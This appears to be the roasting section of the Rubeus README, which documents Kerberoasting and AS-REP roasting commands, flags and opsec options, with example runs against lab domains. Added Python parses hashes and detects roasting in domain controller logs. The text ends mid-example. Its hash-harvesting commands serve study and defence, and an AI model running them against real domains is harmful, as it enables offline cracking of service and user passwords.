# Roasting

Breakdown of the roasting commands:

| Command    | Description                                              |
| ---------- | -------------------------------------------------------- |
| kerberoast | Perform Kerberoasting against all (or specified) users   |
| asreproast | Perform AS-REP roasting against all (or specified) users |

### kerberoast

The **kerberoast** action replaces the [SharpRoast](https://github.com/GhostPack/SharpRoast) project's functionality. Like SharpRoast, this action uses the [`KerberosRequestorSecurityToken.GetRequest()`](https://msdn.microsoft.com/en-us/library/system.identitymodel.tokens.kerberosrequestorsecuritytoken.getrequest(v=vs.110).aspx) method, an approach that was contributed to PowerView by [@machosec](https://twitter.com/machosec), in order to request the proper service ticket (this is the default behavior; see the opsec table for more detail). Unlike SharpRoast, this action now performs proper ASN.1 parsing of the result structures.

With no other arguments, all user accounts with SPNs set in the current domain are Kerberoasted, *requesting their highest supported encryption type* (see the opsec table). The `/spn:X` argument roasts just the specified SPN, the `/user:X` argument roasts just the specified user, and the `/ou:X` argument roasts just the users in the specified OU. The `/domain` and `/dc` arguments are optional, pulling system defaults as other actions do.

The `/stats` flag will output statistics about kerberoastable users found, including a breakdown of supported encryption types and years user passwords were last set. This flag can be combined with other targeting options.

The `/outfile:FILE` argument outputs roasted hashes to the specified file, one per line.

If the `/simple` flag is specified, roasted hashes will be output to the console, one per line.

If the `/nowrap` flag is specified, Kerberoast results will not be line-wrapped.

If a TGT is supplied with `/ticket:X` (the base64 encoding of a .kirbi file, or the path to a .kirbi file on disk), that TGT is used to request the service tickets during roasting. If `/ticket:X` is used with `/spn:Y` or `/spns:Y` (`/spns:` can be a file containing one SPN per line or a comma-separated list), then no LDAP searching happens for users, so it can be done from a non-domain-joined system in conjunction with `/dc:Z`.

If the `/tgtdeleg` flag is supplied, the tgtdeleg trick is used to get a usable TGT for the current user, which is then used for the roasting requests. If this flag is used, accounts with AES enabled in **msDS-SupportedEncryptionTypes** will have RC4 tickets requested.

If the `/aes` flag is supplied, accounts with AES encryption enabled in **msDS-SupportedEncryptionTypes** are enumerated and AES service tickets are requested.

If the `/ldapfilter:X` argument is supplied, the supplied LDAP filter will be added to the final LDAP query used to find Kerberoastable users.

If the `/rc4opsec` flag is specified, the **tgtdeleg** trick is used, and accounts **without** AES enabled are enumerated and roasted.

If you want to use alternate domain credentials for Kerberoasting (and searching for users to Kerberoast), they can be specified with `/creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD`.

If the `/pwdsetafter:MM-dd-yyyy` argument is supplied, only accounts whose password was last changed after MM-dd-yyyy will be enumerated and roasted.

If the `/pwdsetbefore:MM-dd-yyyy` argument is supplied, only accounts whose password was last changed before MM-dd-yyyy will be enumerated and roasted.

If the `/resultlimit:NUMBER` argument is specified, the number of accounts that will be enumerated and roasted is limited to NUMBER.

If the `/delay:MILLISECONDS` argument is specified, that number of milliseconds is paused between TGS requests. The `/jitter:1-100` argument can be combined with it to apply that percentage of jitter to the delay.

If the `/enterprise` flag is used, the SPN is assumed to be an enterprise principal (i.e. `user@domain.com`). This flag only works when Kerberoasting with a TGT.

If the `/autoenterprise` flag is used and roasting an SPN fails (due to an invalid or duplicate SPN), Rubeus will automatically retry using the enterprise principal. This is only useful when `/spn` or `/spns` is *not* supplied, as Rubeus needs to know the target account's sAMAccountName, which it gets when querying LDAP for the account information.
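The one-per-line hash layout that `/outfile` and `/simple` emit carries the ticket encryption type right after the `$krb5tgs$` prefix (23 for RC4, 17 or 18 for AES), which is what a defender reviewing a roasting report needs in order to decide which service accounts to rotate first and move to AES-only. The following Python parser is an added example for this page, not Rubeus code; the hash lines it consumes are constructed (short hex stand-ins for the real checksum and ciphertext) in the `$krb5tgs$<etype>$*<user>$<realm>$<spn>*$<checksum>$<edata>` layout shown in the examples further down, including the empty user field that older Rubeus versions produce.

```python
import re
from collections import Counter

# Layout of one Rubeus kerberoast hash line (John the Ripper krb5tgs style):
#   $krb5tgs$<etype>$*<user>$<realm>$<spn>*$<checksum-hex>$<edata-hex>
# <user> is empty in output from older Rubeus versions.
_TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>[^$]*)\$(?P<realm>[^$]*)\$(?P<spn>[^*]*)\*\$"
    r"(?P<checksum>[0-9A-Fa-f]+)\$(?P<edata>[0-9A-Fa-f]+)$"
)

# Kerberos encryption type numbers that show up in roasted hashes (RFC 3961 / RFC 4757).
ETYPE_NAMES = {
    23: "RC4_HMAC",
    17: "AES128_CTS_HMAC_SHA1_96",
    18: "AES256_CTS_HMAC_SHA1_96",
}


def parse_krb5tgs(line):
    """Split one roasted hash line into its fields; raises ValueError for anything else."""
    m = _TGS_RE.match(line.strip())
    if m is None:
        raise ValueError("not a $krb5tgs$ line: %r" % line[:40])
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])
    fields["etype_name"] = ETYPE_NAMES.get(fields["etype"], "UNKNOWN")
    return fields


def summarize(lines):
    """Count roasted hashes per encryption type and list the SPNs that were roasted
    with RC4, i.e. the accounts whose passwords are cheapest to attack offline."""
    by_etype = Counter()
    rc4_spns = []
    skipped = 0
    for line in lines:
        if not line.strip():
            continue
        try:
            h = parse_krb5tgs(line)
        except ValueError:
            skipped += 1          # banner text, status lines, "(snip)" fragments
            continue
        by_etype[h["etype_name"]] += 1
        if h["etype"] == 23:
            rc4_spns.append(h["spn"])
    return {"by_etype": dict(by_etype), "rc4_spns": rc4_spns, "skipped": skipped}


# Constructed sample of a hashes.txt file: realistic layout, abbreviated hex values.
SAMPLE_HASHES = """\
$krb5tgs$23$*sqlservice$testlab.local$MSSQLSvc/SQL.testlab.local*$0123456789abcdef0123456789abcdef$a1b2c3d4e5f6
$krb5tgs$18$*harmj0y$theshire.local$testspn/server*$f63783c58aa153f24dfcc796a120c55c$06c6929374a2d3
$krb5tgs$23$*$testlab.local$asdf/asdfasdf*$ae5f019d4cded6cd74830ccd00112233$e2b3869290
[*] Roasted hashes written to : C:\\Temp\\hashes.txt
"""

if __name__ == "__main__":
    print(summarize(SAMPLE_HASHES.splitlines()))
```

A `/outfile` result can be fed to `summarize()` as-is. Every SPN in `rc4_spns` belongs to an account that either lacks AES in **msDS-SupportedEncryptionTypes** or was roasted through one of the RC4-forcing modes below; in both cases the fix on the defending side is the same: a long, random password (or a managed service account) and AES-only encryption types.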

#### kerberoasting opsec

Here is a table comparing the behavior of various flags from an opsec perspective:

| Arguments           | Description                                                                                                                    |
| ------------------- | ------------------------------------------------------------------------------------------------------------------------------ |
| **none**            | Use KerberosRequestorSecurityToken roasting method, roast w/ highest supported encryption                                      |
| **/tgtdeleg**       | Use the **tgtdeleg** trick to perform TGS-REQ requests of RC4-enabled accounts, roast all accounts w/ RC4 specified            |
| **/ticket:X**       | Use the supplied TGT blob/file for TGS-REQ requests, roast all accounts w/ RC4 specified                                       |
| **/rc4opsec**       | Use the **tgtdeleg** trick, enumerate accounts *without* AES enabled, roast w/ RC4 specified                                   |
| **/aes**            | Enumerate accounts with AES enabled, use KerberosRequestorSecurityToken roasting method, roast w/ highest supported encryption |
| **/aes /tgtdeleg**  | Use the **tgtdeleg** trick, enumerate accounts with AES enabled, roast w/ AES specified                                        |
| **/pwdsetafter:X**  | Use the supplied date and only enumerate accounts with password last changed after that date                                   |
| **/pwdsetbefore:X** | Use the supplied date and only enumerate accounts with password last changed before that date                                  |
| **/resultlimit:X**  | Use the specified number to limit the accounts that will be roasted                                                            |
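Read from the defender's side, the opsec table describes what each mode leaves in the domain controller's Security log: the default and `/aes` modes request the account's highest supported etype, while `/tgtdeleg`, `/ticket:X` and `/rc4opsec` produce RC4 tickets, so an RC4 (0x17) service ticket for an account whose **msDS-SupportedEncryptionTypes** includes AES is a downgrade worth alerting on, and a burst of service-ticket requests for many distinct user accounts from one host is the signature every mode shares. The following Python is an added example, not Rubeus code: it decodes the **msDS-SupportedEncryptionTypes** bitmask into the names Rubeus prints and applies both checks to constructed 4769 records, assumed here to be flattened into `key=value` fields (real exports arrive as XML or JSON and need a different loader).

```python
from collections import defaultdict

# msDS-SupportedEncryptionTypes bit flags (MS-KILE). An absent or zero value means the
# account only gets the RC4 default, which Rubeus reports as RC4_HMAC_DEFAULT.
ETYPE_FLAGS = {
    0x1: "DES_CBC_CRC",
    0x2: "DES_CBC_MD5",
    0x4: "RC4_HMAC",
    0x8: "AES128_CTS_HMAC_SHA1_96",
    0x10: "AES256_CTS_HMAC_SHA1_96",
}
AES_BITS = 0x8 | 0x10
RC4_TICKET = 0x17   # TicketEncryptionType value of an RC4-HMAC service ticket in event 4769


def decode_supported_etypes(value):
    """Turn the attribute value into the list Rubeus prints under 'Supported ETypes'."""
    if not value:
        return ["RC4_HMAC_DEFAULT"]
    return [name for bit, name in sorted(ETYPE_FLAGS.items()) if value & bit]


def supports_aes(value):
    return bool(value & AES_BITS)


def parse_event(line):
    """Split a flattened 'key=value key=value' record (constructed format for this example)."""
    return dict(field.split("=", 1) for field in line.split())


def detect_kerberoast(events, account_etypes, burst_threshold=5):
    """Return findings over 4769 records: RC4 tickets issued for AES-capable service
    accounts (the downgrade the RC4-forcing modes cause) and sources that collected
    service tickets for many distinct user accounts."""
    findings = []
    services_by_source = defaultdict(set)
    for ev in (parse_event(line) for line in events):
        if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
            continue
        svc = ev["ServiceName"]
        # Computer accounts and the krbtgt service are not Kerberoasting targets.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        src = ev["IpAddress"]
        services_by_source[src].add(svc)
        etype = int(ev["TicketEncryptionType"], 16)
        if etype == RC4_TICKET and supports_aes(account_etypes.get(svc, 0)):
            findings.append({"type": "rc4_downgrade", "source": src, "service": svc,
                             "supported": decode_supported_etypes(account_etypes[svc])})
    for src, svcs in services_by_source.items():
        if len(svcs) >= burst_threshold:
            findings.append({"type": "tgs_burst", "source": src, "services": sorted(svcs)})
    return findings


# Constructed sample: one host pulls RC4 tickets for five user accounts in a row, another
# host does ordinary AES logons. Account values are constructed msDS-SupportedEncryptionTypes.
SAMPLE_EVENTS = [
    "EventID=4769 TargetUserName=bob@TESTLAB.LOCAL ServiceName=sqlservice TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:192.168.52.20",
    "EventID=4769 TargetUserName=bob@TESTLAB.LOCAL ServiceName=harmj0y TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:192.168.52.20",
    "EventID=4769 TargetUserName=bob@TESTLAB.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:192.168.52.20",
    "EventID=4769 TargetUserName=bob@TESTLAB.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:192.168.52.20",
    "EventID=4769 TargetUserName=bob@TESTLAB.LOCAL ServiceName=svc_mon TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:192.168.52.20",
    "EventID=4769 TargetUserName=bob@TESTLAB.LOCAL ServiceName=WEB01$ TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:192.168.52.20",
    "EventID=4769 TargetUserName=alice@TESTLAB.LOCAL ServiceName=sqlservice TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:192.168.52.31",
    "EventID=4769 TargetUserName=alice@TESTLAB.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:192.168.52.31",
    "EventID=4769 TargetUserName=carol@TESTLAB.LOCAL ServiceName=svc_old TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:192.168.52.40",
]
SAMPLE_ACCOUNTS = {"sqlservice": 0x18, "harmj0y": 0, "svc_backup": 0x1c,
                   "svc_web": 0x4, "svc_mon": 0x18, "svc_old": 0}

if __name__ == "__main__":
    for finding in detect_kerberoast(SAMPLE_EVENTS, SAMPLE_ACCOUNTS):
        print(finding)
```

The downgrade check only fires for accounts that actually support AES, which is why the `/rc4opsec` row of the table is the hardest to catch by encryption type alone: it deliberately skips those accounts, and the volume heuristic (or the encryption-type statistics that `/stats` prints, flipped around to show how many accounts are still RC4-only) is what remains. The `burst_threshold` of 5 distinct services is a constructed starting point; tune it against the baseline of the environment.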

#### Examples

Kerberoasting all users in the current domain using the default `KerberosRequestorSecurityToken.GetRequest` method:

```
C:\Rubeus>Rubeus.exe kerberoast

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: Kerberoasting


[*] SamAccountName         : harmj0y
[*] DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName   : asdf/asdfasdf
[*] Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$AE5F019D4CDED6CD74830CC...(snip)...


[*] SamAccountName         : sqlservice
[*] DistinguishedName      : CN=SQL,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName   : MSSQLSvc/SQL.testlab.local
[*] Hash                   : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$E2B3869290...(snip)...

...(snip)...
```

Kerberoasting all users in a specific OU, saving the hashes to an output file:

```
C:\Rubeus>Rubeus.exe kerberoast /ou:OU=TestingOU,DC=testlab,DC=local /outfile:C:\Temp\hashes.txt

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: Kerberoasting

[*] Target OU              : OU=TestingOU,DC=testlab,DC=local

[*] SamAccountName         : testuser2
[*] DistinguishedName      : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
[*] ServicePrincipalName   : service/host
[*] Hash written to C:\Temp\hashes.txt

[*] Roasted hashes written to : C:\Temp\hashes.txt
```

Perform Kerberoasting using the `tgtdeleg` trick to get a usable TGT, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 3 service tickets:

```
C:\Rubeus>Rubeus.exe kerberoast /tgtdeleg /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:3

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts with lastpwdset from 01-31-2005 to 03-29-2010
[*] Up to 3 result(s) will be returned

[*] Total kerberoastable users : 3


[*] SamAccountName         : harmj0y
[*] DistinguishedName      : CN=harmj0y,OU=TestOU,DC=theshire,DC=local
[*] ServicePrincipalName   : testspn/server
[*] PwdLastSet             : 5/31/2008 12:00:02 AM
[*] Supported ETypes       : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash                   : $krb5tgs$23$*harmj0y$theshire.local$testspn/server*$F6EEFE5026CF8F02E3DC...(snip)...


[*] SamAccountName         : constraineduser
[*] DistinguishedName      : CN=constraineduser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName   : blah/blah123
[*] PwdLastSet             : 9/5/2009 7:48:50 PM
[*] Supported ETypes       : RC4_HMAC
[*] Hash                   : $krb5tgs$23$*constraineduser$theshire.local$blah/blah123*$6F0992C377AA12...(snip)...


[*] SamAccountName         : newuser
[*] DistinguishedName      : CN=newuser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName   : blah/blah123456
[*] PwdLastSet             : 9/12/2008 8:05:16 PM
[*] Supported ETypes       : RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash                   : $krb5tgs$23$*newuser$theshire.local$blah/blah123456*$C4561559C2A7DF07712...(snip)...
```

List statistics about found Kerberoastable accounts without actually sending ticket requests:

```
C:\Rubeus>Rubeus.exe kerberoast /stats

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] Listing statistics about target users, no ticket requests being performed.
[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 4


 ----------------------------------------------------------------------
 | Supported Encryption Type                                  | Count |
 ----------------------------------------------------------------------
 | RC4_HMAC_DEFAULT                                           | 1     |
 | RC4_HMAC                                                   | 1     |
 | AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96           | 1     |
 | RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1     |
 ----------------------------------------------------------------------

 ----------------------------------
 | Password Last Set Year | Count |
 ----------------------------------
 | 2019                   | 4     |
 ----------------------------------
```

Kerberoasting a specific user, with simplified hash output:

```
C:\Rubeus>Rubeus.exe kerberoast /user:harmj0y /simple

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User            : harmj0y
[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 1

$krb5tgs$18$*harmj0y$theshire.local$testspn/server*$F63783C58AA153F24DFCC796A120C55C$06C6929374A2D3...(snip)...
```

Kerberoasting all users in a foreign *trusting* domain, not line-wrapping the results:

```
C:\Rubeus>Rubeus.exe kerberoast /domain:dev.testlab.local /nowrap

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.5.0


[*] Action: Kerberoasting

[*] Target Domain          : dev.testlab.local

[*] SamAccountName         : jason
[*] DistinguishedName      : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
[*] ServicePrincipalName   : test/test
[*] Hash                   : $krb5tgs$23$*$dev.testlab.local$test/test@dev.testlab.local*$969339A82...(snip)...
```

Kerberoasting using an existing TGT:

```
C:\Rubeus>Rubeus.exe kerberoast /ticket:doIFujCCBbagAwIBBaEDAgEWoo...(snip)... /spn:"asdf/asdfasdf" /dc:primary.testlab.local

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.5


[*] Action: Kerberoasting

[*] Using a TGT /ticket to request service tickets

[*] Target SPN             : asdf/asdfasdf
[*] Hash                   : $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$4EFF99FDED690AB4616EB...(snip)...
```

"Opsec" Kerberoasting, using the **tgtdeleg** trick, filtering out AES-enabled accounts:

```
C:\Rubeus>Rubeus.exe kerberoast /rc4opsec

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.6


[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES

[*] Found 6 users to Kerberoast!

[*] SamAccountName         : harmj0y
[*] DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName   : asdf/asdfasdf
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*harmj0y$testlab.local$asdf/asdfasdf*$6B4AD4B61D37D54...(snip)...
```

### asreproast

The **asreproast** action replaces the [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast/) project which executed similar actions with the (larger sized) [BouncyCastle](https://www.bouncycastle.org/) library. If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting. For more technical information, [see this post](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/).

Just as with the [kerberoast](#kerberoast) command, if no other arguments are supplied, all user accounts that do not require Kerberos preauthentication are roasted. The `/user:X` argument roasts just the specified user, and the `/ou:X` argument roasts just the users in the specified OU. The `/domain` and `/dc` arguments are optional, pulling system defaults as other actions do.

The `/outfile:FILE` argument outputs roasted hashes to the specified file, one per line.

Also, if you want to use alternate domain credentials for AS-REP roasting (and for searching for users to roast), they can be specified with `/creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD`.

The output format (`/format:X`) defaults to John the Ripper ([Jumbo version](https://github.com/magnumripper/JohnTheRipper)); `/format:hashcat` is also an option, producing the format for the newer hashcat mode 18200.
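AS-REP roasting works only against accounts that have the DONT_REQ_PREAUTH bit (0x400000, the decimal 4194304 used in bitwise LDAP filters) set in **userAccountControl**, and each successful roast shows up on the domain controller as a 4768 event whose PreAuthType is 0 and whose Status is 0x0. The Python below is an added example for this page, not Rubeus or ASREPRoast code: it audits constructed account records for the flag and runs the matching detection over constructed 4768 records, assumed to be flattened into `key=value` fields (PreAuthType 2 is the normal PA-ENC-TIMESTAMP preauthentication; Status 0x19 is the KDC_ERR_PREAUTH_REQUIRED reply that starts an ordinary logon and issues no ticket).

```python
from collections import defaultdict

# userAccountControl bit that disables Kerberos preauthentication for an account
# (UF_DONT_REQUIRE_PREAUTH). Its decimal value, 4194304, is the number that appears in the
# LDAP filter used to find roastable accounts.
DONT_REQ_PREAUTH = 0x400000
RC4_HMAC = 0x17   # TicketEncryptionType of an RC4 AS-REP, the cheapest one to crack offline


def preauth_disabled(user_account_control):
    return bool(user_account_control & DONT_REQ_PREAUTH)


def audit_accounts(accounts):
    """Return the sAMAccountNames (from a name -> userAccountControl mapping) that are
    exposed to AS-REP roasting because preauthentication is switched off."""
    return sorted((name for name, uac in accounts.items() if preauth_disabled(uac)), key=str.lower)


def parse_event(line):
    """Split a flattened 'key=value key=value' record (constructed format for this example)."""
    return dict(field.split("=", 1) for field in line.split())


def detect_asrep_roast(events, burst_threshold=2):
    """Flag every TGT issued without preauthentication (its AS-REP can be cracked offline)
    and every source that collected such replies for several accounts."""
    findings = []
    accounts_by_source = defaultdict(set)
    for ev in (parse_event(line) for line in events):
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue            # failed requests issued no ticket, nothing to crack
        if ev.get("PreAuthType") != "0":
            continue            # preauthenticated logon: the reply is not roastable
        etype = int(ev["TicketEncryptionType"], 16)
        findings.append({
            "type": "asrep_without_preauth",
            "account": ev["TargetUserName"],
            "source": ev["IpAddress"],
            "rc4": etype == RC4_HMAC,
        })
        accounts_by_source[ev["IpAddress"]].add(ev["TargetUserName"])
    for src, names in accounts_by_source.items():
        if len(names) >= burst_threshold:
            findings.append({"type": "asrep_burst", "source": src,
                             "accounts": sorted(names, key=str.lower)})
    return findings


# Constructed sample: one host harvests AS-REPs for three preauth-disabled accounts;
# alice and bob are ordinary logons (preauthenticated, and the initial preauth-required error).
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=dfm.a TargetDomainName=TESTLAB.LOCAL PreAuthType=0 TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:192.168.52.20",
    "EventID=4768 TargetUserName=TestOU3user TargetDomainName=TESTLAB.LOCAL PreAuthType=0 TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:192.168.52.20",
    "EventID=4768 TargetUserName=harmj0y2 TargetDomainName=TESTLAB.LOCAL PreAuthType=0 TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:192.168.52.20",
    "EventID=4768 TargetUserName=alice TargetDomainName=TESTLAB.LOCAL PreAuthType=2 TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:192.168.52.31",
    "EventID=4768 TargetUserName=bob TargetDomainName=TESTLAB.LOCAL PreAuthType=0 TicketEncryptionType=0xffffffff Status=0x19 IpAddress=::ffff:192.168.52.31",
]
# Constructed userAccountControl values: 0x200 NORMAL_ACCOUNT, 0x10000 DONT_EXPIRE_PASSWORD.
SAMPLE_ACCOUNTS = {"dfm.a": 0x410200, "TestOU3user": 0x400200, "harmj0y2": 0x400200,
                   "alice": 0x10200, "bob": 0x200}

if __name__ == "__main__":
    print("preauth disabled:", audit_accounts(SAMPLE_ACCOUNTS))
    for finding in detect_asrep_roast(SAMPLE_EVENTS):
        print(finding)
```

The audit list is the remediation list: clearing the flag on those accounts removes the exposure entirely, because the AS-REQ then fails with KDC_ERR_PREAUTH_REQUIRED instead of returning an encrypted AS-REP. Where an application genuinely needs preauthentication off, the detection side still identifies the requesting hosts, and the `rc4` field separates replies that a policy of AES-only encryption types would have hardened from those that it would not.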

AS-REP roasting all users in the current domain:

```
C:\Rubeus>Rubeus.exe asreproast

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target Domain          : testlab.local

[*] SamAccountName         : dfm.a
[*] DistinguishedName      : CN=dfm.a,CN=Users,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\dfm.a'
[*] Connecting to 192.168.52.100:88
[*] Sent 163 bytes
[*] Received 1537 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$dfm.a@testlab.local:D4A4BC281B200EE35CBF4A4537792D07$D655...(snip)...

[*] SamAccountName         : TestOU3user
[*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$TestOU3user@testlab.local:DD6DF16B7E65223679CD703837C94FB...(snip)..

[*] SamAccountName         : harmj0y2
[*] DistinguishedName      : CN=harmj0y2,CN=Users,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\harmj0y2'
[*] Connecting to 192.168.52.100:88
[*] Sent 166 bytes
[*] Received 1407 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$harmj0y2@testlab.local:7D2E379A076BB804AF275ED51B86BF85$8...(snip)..
```

AS-REP roasting all users in a specific OU, saving the hashes to an output file in Hashcat format:

```
C:\Rubeus>Rubeus.exe asreproast /ou:OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local /format:hashcat /outfile:C:\Temp\hashes.txt

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target OU              : OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Target Domain          : testlab.local

[*] SamAccountName         : TestOU3user
[*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Temp\hashes.txt

[*] Roasted hashes written to : C:\Temp\hashes.txt
```

AS-REP roasting a specific user:

```
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target User            : TestOU3user
[*] Target Domain          : testlab.local

[*] SamAccountName         : TestOU3user
[*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
```

AS-REP roasting all users in a foreign *trusting* domain:

```
C:\Rubeus>Rubeus.exe asreproast /domain:dev.testlab.local

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target Domain          : dev.testlab.local

[*] SamAccountName         : devuser3
[*] DistinguishedName      : CN=devuser3,CN=Users,DC=dev,DC=testlab,DC=local
[*] Using domain controller: dev.testlab.local (192.168.52.105)
[*] Building AS-REQ (w/o preauth) for: 'dev.testlab.local\devuser3'
